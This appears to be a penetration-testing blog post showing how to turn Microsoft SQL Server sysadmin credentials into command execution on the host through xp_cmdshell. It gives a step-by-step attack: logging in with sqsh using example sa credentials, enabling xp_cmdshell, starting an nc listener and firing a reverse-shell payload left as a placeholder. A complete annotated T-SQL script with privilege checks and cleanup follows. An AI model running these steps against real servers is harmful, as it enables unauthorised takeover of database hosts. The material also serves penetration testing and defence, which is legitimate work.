SQL Server — xp_cmdshell to RCE

Basic Information

Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications — which may run either on the same computer or on another computer across a network (including the Internet). From Wikipedia.

What is xp_cmdshell?

xp_cmdshell is an extended stored procedure shipped by Microsoft in the master database. It spawns a Windows command shell, hands it a command string, and returns the output as rows, so operating system commands can be issued directly from T-SQL. It is disabled by default (since SQL Server 2005) and enabling it needs sysadmin rights (strictly, the ALTER SETTINGS permission). Commands run in the security context of the SQL Server service account when the caller is a sysadmin, or of the xp_cmdshell proxy account for other logins. That is what makes it dangerous: a database login with enough privilege becomes code execution on the host, and trojans and worms have used it for exactly that.

Requirement

Microsoft SQL Server credentials with sysadmin rights (needed to enable xp_cmdshell)
- username and password, e.g. sa:123456

Step to Attack

  1. First, get a database shell with sqsh:
sqsh -S <IP> -U <Username> -P <Password>
  2. Enable xp_cmdshell. It is an advanced option, so 'show advanced options' has to be switched on first; RECONFIGURE applies each change immediately. This needs sysadmin rights, which is why sa is the usual target:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
go
  3. Confirm command execution and see which account the commands run as (the SQL Server service account for a sysadmin caller):
xp_cmdshell 'whoami';
go
  4. On the attacker machine, start a listener:
nc -lnvp 443
  5. Back in sqsh, launch the reverse-shell payload; it must connect back to the listener on port 443:
xp_cmdshell '<payload>';
go
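The procedure above, and the behaviour described under "What is xp_cmdshell?", written out as one complete T-SQL script with the checks a tester wants before and after. This is an added example, not code from the original post: it assumes a sysadmin-equivalent login such as sa, a listener already waiting on the attacker host, and keeps <payload> as a placeholder for the reverse-shell command line. The `go` lines are the batch terminator that sqsh (and sqlcmd) use; they are not T-SQL.

```sql
-- Added example, not from the original post. Assumes a sysadmin login
-- (e.g. sa) and a listener already running on the attacker host.
-- <payload> is a placeholder for the reverse-shell command line.

-- 1. Can this login enable xp_cmdshell at all? sp_configure and
--    xp_cmdshell need sysadmin; 1 = member, 0 = not, NULL = unknown role.
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
go

-- 2. Record the current state so it can be restored afterwards.
--    value_in_use = 1 means the option is active right now.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
go

-- 3. Enable xp_cmdshell. It is an advanced option, so advanced options
--    must be visible first; RECONFIGURE applies each change immediately.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go

-- 4. Commands run as the SQL Server service account for a sysadmin caller.
--    Capture the output in a table variable so it can be filtered in T-SQL
--    (xp_cmdshell returns one row per output line, plus a trailing NULL).
DECLARE @out TABLE (line NVARCHAR(4000));
INSERT INTO @out EXEC master..xp_cmdshell 'whoami';
SELECT line FROM @out WHERE line IS NOT NULL;
go

-- 5. Fire the reverse-shell payload. xp_cmdshell is synchronous: this
--    batch does not return until the payload process exits, so the sqsh
--    session hangs while the shell is live. no_output just suppresses
--    the result rows.
EXEC master..xp_cmdshell '<payload>', no_output;
go

-- 6. Clean up once the shell is no longer needed: put the settings back
--    to what step 2 showed, so the server is not left more exposed than
--    it was found (this script assumes both were 0).
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
go
```

Two practical notes. Because step 5 blocks the session, run it from a sqsh session you can spare and do step 6 from a second one. And every sp_configure change is visible to defenders: the new value shows up in sys.configurations and in the SQL Server error log, so an engagement that enables xp_cmdshell and walks away leaves an obvious trace as well as an open door.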

GrimTheRipper